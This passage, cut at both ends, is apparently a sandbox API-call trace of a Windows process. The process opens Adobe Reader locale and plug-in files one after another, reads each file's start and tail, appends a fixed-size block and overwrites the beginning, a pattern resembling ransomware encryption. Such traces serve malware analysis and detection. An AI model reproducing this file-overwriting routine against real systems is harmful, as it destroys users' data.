lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.198] CloseHandle (hObject=0x204) returned 1 [0086.198] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Checkers.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\checkers.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0086.199] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.199] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x13200 [0086.200] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.200] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.200] ReleaseMutex (hMutex=0x168) returned 1 [0086.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.CHS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.CHS", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.CHS", lpUsedDefaultChar=0x0) returned 12 [0086.200] ReadFile (in: hFile=0x204, lpBuffer=0x2665398, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.205] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x12200 [0086.205] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.206] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x12200 [0086.206] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.206] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0086.206] WriteFile (in: hFile=0x204, lpBuffer=0x2665398*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.207] CloseHandle (hObject=0x204) returned 1 [0086.207] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\pddom.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\pddom.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0086.208] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.208] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x2200 [0086.208] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.208] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.208] ReleaseMutex (hMutex=0x168) returned 1 [0086.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.CHS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0086.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.CHS", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.CHS", lpUsedDefaultChar=0x0) returned 9 [0086.209] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.211] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1200 [0086.211] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.211] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x1200 [0086.212] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.212] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0086.212] WriteFile (in: hFile=0x204, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.212] CloseHandle (hObject=0x204) returned 1 [0086.212] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0086.213] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.213] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x899d [0086.213] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.213] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.214] ReleaseMutex (hMutex=0x168) returned 1 [0086.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0086.214] ReadFile (in: hFile=0x204, lpBuffer=0x2665398, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.216] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x799d [0086.217] ReadFile (in: hFile=0x204, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.217] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x799d [0086.217] WriteFile (in: hFile=0x204, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.217] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0086.217] WriteFile (in: hFile=0x204, lpBuffer=0x2665398*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.217] CloseHandle (hObject=0x204) returned 1 [0086.218] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Annots.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\annots.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0086.218] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.219] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4c600 [0086.219] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0086.219] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.219] ReleaseMutex (hMutex=0x168) returned 1 [0086.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.CHT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0086.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.CHT", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.CHT", lpUsedDefaultChar=0x0) returned 10 [0086.219] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0086.227] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4b600 [0086.227] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0087.035] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4b600 [0087.035] WriteFile (in: hFile=0x204, lpBuffer=0x26679c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26679c8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0087.035] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0087.035] WriteFile (in: hFile=0x204, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0087.035] CloseHandle (hObject=0x204) returned 1 [0087.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\makeaccessible.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\makeaccessible.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0087.036] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0087.036] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9400 [0087.037] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0087.037] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.037] ReleaseMutex (hMutex=0x168) returned 1 [0087.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.CHT", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0087.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.CHT", cchWideChar=18, lpMultiByteStr=0x1f88c44, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.CHT", lpUsedDefaultChar=0x0) returned 18 [0087.037] ReadFile (in: hFile=0x204, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0087.039] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8400 [0087.039] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0087.039] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8400 [0087.040] WriteFile (in: hFile=0x204, lpBuffer=0x2888e18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2888e18*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0087.040] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0087.040] WriteFile (in: hFile=0x204, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0087.040] CloseHandle (hObject=0x204) returned 1 [0087.041] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Search.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\search.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0087.041] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0087.041] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3800 [0087.041] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0087.041] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.042] ReleaseMutex (hMutex=0x168) returned 1 [0087.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.CHT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0087.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.CHT", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.CHT", lpUsedDefaultChar=0x0) returned 10 [0087.042] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0087.043] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2800 [0087.044] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0087.044] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x2800 [0087.044] WriteFile (in: hFile=0x204, lpBuffer=0x26679c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x26679c8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0087.044] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0087.045] WriteFile (in: hFile=0x204, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x359f28c*=0x1000, lpOverlapped=0x0) returned 1 [0087.045] CloseHandle (hObject=0x204) returned 1 [0087.045] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Accessibility.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\accessibility.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0087.046] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0087.046] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7ec63 [0087.046] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0087.046] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.046] ReleaseMutex (hMutex=0x168) returned 1 [0087.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.api", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.api", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Accessibility.api", lpUsedDefaultChar=0x0) returned 17 [0087.046] ReadFile (in: hFile=0x204, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x359f278*=0x8000, lpOverlapped=0x0) returned 1 [0087.107] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7dc63 [0087.107] ReadFile (in: hFile=0x204, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0087.230] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x7dc63 [0087.230] WriteFile (in: hFile=0x204, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0087.231] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0087.231] WriteFile (in: hFile=0x204, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0087.232] CloseHandle (hObject=0x204) returned 1 [0087.241] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\checkers.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0087.242] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0087.242] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xd2463 [0087.242] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0087.242] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.242] ReleaseMutex (hMutex=0x168) returned 1 [0087.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.api", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.api", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.api", lpUsedDefaultChar=0x0) returned 12 [0087.243] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0088.254] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.291] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd1463 [0088.291] ReadFile (in: hFile=0x204, lpBuffer=0x28a09a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x28a09a8*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.406] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xd1463 [0088.408] WriteFile (in: 